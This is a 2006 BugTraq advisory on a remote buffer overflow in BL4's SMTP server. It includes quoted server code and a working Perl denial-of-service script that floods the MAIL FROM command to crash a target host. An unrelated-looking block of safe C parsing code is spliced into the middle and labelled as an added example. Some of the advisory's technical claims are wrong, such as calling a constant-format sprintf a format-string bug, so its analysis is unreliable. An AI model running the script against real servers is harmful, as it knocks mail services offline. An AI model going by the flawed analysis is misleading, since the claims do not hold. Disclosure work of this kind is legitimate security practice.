BugTraq
BL4's SMTP server BufferOverflow Vulnerable Apr 27 2006 08:24AM
the_day echo or id
---------------------------------------------------------------------------

[ECHO_ADV_30$2006] BL4's SMTP server BufferOverflow Vulnerable

---------------------------------------------------------------------------

Author : Dedi Dwianto

Date : April, 27th 2006

Location : Indonesia, Jakarta

Web : http://advisories.echo.or.id/adv/adv30-theday-2006.txt

Critical Lvl : High

---------------------------------------------------------------------------

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : BL4's SMTP server

version : < 0.1.5

URL : http://bl4qkubartnndfhr.emmeya.com/prog/smtp?0

Description :

BL4's SMTP server is an inbound only SMTP server.

It currently uses hardcoded values for handling email.

The SMTP server puts the incoming email into various text files.

---------------------------------------------------------------------------

Vulnerability:

~~~~~~~~~~~~~~~~

BL4's SMTP server is affected by a flaw that can allow a remote attacker to cause a denial of service or execute arbitrary code.

The vulnerability is due to a buffer overflow in the SMTP service.

A remote attacker can repeatedly send more than 2100 bytes as the argument to the HELO, MAIL FROM, and RCPT TO commands to crash the server.

------------------think.c-----------------------------------

...........

{

slaveEmail[x]->isData = 0;

slaveEmail[x]->emailFrom = 0;

slaveEmail[x]->emailTo = 0;

free(buffer);

buffer = malloc(sizeof(char) * 12);

sprintf(buffer, "250 OK\r\n");

return buffer;

}

free(buffer);

.............

slaveEmail[x]->EHLO = buffer;

slaveEmail[x]->EHLOtrue = 1;

buffer = malloc(sizeof(char) * 12);

sprintf(buffer, "250 OK\r\n");

return buffer;

-----------------------------------------------------------

--

sprintf(buffer, "250 OK\r\n");

--

Vulnerable to format strings.

--

free(buffer);

buffer = malloc(sizeof(char) * 12);

--

Vulnerable to buffer overflow.

An attacker can create arbitrary code here.
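
A bounded way to handle the HELO, MAIL FROM and RCPT TO arguments described above, shown as an added example (not code from this advisory or from BL4's SMTP server). The session struct, the function names and the reply text are assumptions; the 512-octet and 256-octet limits are the command-line and path limits from RFC 5321.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_LINE 512  /* RFC 5321 4.5.3.1.4: command line, CRLF included */
#define MAX_ADDR 256  /* RFC 5321 4.5.3.1.3: reverse-path / forward-path */

/* Hypothetical per-connection state; names are not taken from think.c. */
struct session {
    char helo[MAX_LINE], mail_from[MAX_ADDR + 1], rcpt_to[MAX_ADDR + 1];
};

/* Copy an argument only if it is non-empty and fits, terminator included. */
static int store_arg(char *dst, size_t cap, const char *arg, size_t n)
{
    if (n == 0 || n >= cap)
        return -1;
    memcpy(dst, arg, n);
    dst[n] = '\0';
    return 0;
}

/* line: len raw bytes ending in CRLF (not NUL-terminated).
 * Writes the reply with snprintf and returns the SMTP reply code. */
int handle_line(struct session *s, const char *line, size_t len,
                char *reply, size_t replysz)
{
    static const struct { const char *verb; size_t off, cap; } cmds[] = {
        { "HELO ",      offsetof(struct session, helo),      MAX_LINE },
        { "MAIL FROM:", offsetof(struct session, mail_from), MAX_ADDR + 1 },
        { "RCPT TO:",   offsetof(struct session, rcpt_to),   MAX_ADDR + 1 },
    };
    int code = 500;  /* unknown verb, missing CRLF, or over-long line */
    if (len >= 2 && len <= MAX_LINE && memcmp(line + len - 2, "\r\n", 2) == 0) {
        size_t n = len - 2;  /* length without CRLF */
        for (size_t i = 0; i < sizeof cmds / sizeof cmds[0]; i++) {
            size_t v = strlen(cmds[i].verb);
            if (n < v || strncasecmp(line, cmds[i].verb, v) != 0)
                continue;
            code = store_arg((char *)s + cmds[i].off, cmds[i].cap,
                             line + v, n - v) == 0 ? 250 : 501;
            break;
        }
    }
    snprintf(reply, replysz, "%d %s\r\n", code, code == 250 ? "OK" : "Rejected");
    return code;
}
```

The length is checked before any byte is copied, so an over-long line is answered with 500 and an over-long address with 501 while the stored session fields stay unchanged.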

Poc:

~~~~~~~~~~~~

#!/usr/bin/perl

use IO::Socket;

use Socket;

my($socket) = "";

if($#ARGV < 1 | $#ARGV > 2) {usage()}

if($#ARGV > 2) { $prt = $ARGV[1] } else { $prt = "25" };

$adr = $ARGV[0];

$prt = $ARGV[1];

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,

PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

print " -- Connecting To SMTP server at $adr port $prt ... \n";

sleep(1);

print $socket "EHLO yahoo.com\r\n" and print " -- Sending Request to $adr .....\n" or die "Error : can't send Request\n";

sleep(1);

print $socket "MAIL FROM:" . "jessy" x 4600 . "\r\n" and print " -- Sending Buffer to $adr .....\n";

sleep(1);

printf("[+]Ok!\n");

printf("[+]Crash service.....\n");

printf("[~]Done.\n");

close($socket);

sub usage()

{

print "\n=========================================\r\n";

print " BL4's SMTP server Remote DOS \r\n";

print "=========================================\r\n";

print " Bug Found by Dedi Dwianto \r\n";

print " www.echo.or.id #e-c-h-o irc.dal.net \r\n";

print " Echo Security Research Group \r\n";

print "=========================================\r\n";

print " Usage: perl bl4-explo.pl [target] [port] \r\n\n";

exit();

}

---------------------------------------------------------------------------

Shoutz:

~~~~~~~

~ y3dips,moby,comex,z3r0byt3,K-158,c-a-s-e,S`to,lirva32,anonymous

~ newbie_hacker (at) yahoogroups (dot) com

~ #aikmel #e-c-h-o @irc.dal.net

---------------------------------------------------------------------------

Contact:

~~~~~~~~

Dedi Dwianto || echo|staff || the_day[at]echo[dot]or[dot]id

Homepage: http://theday.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------
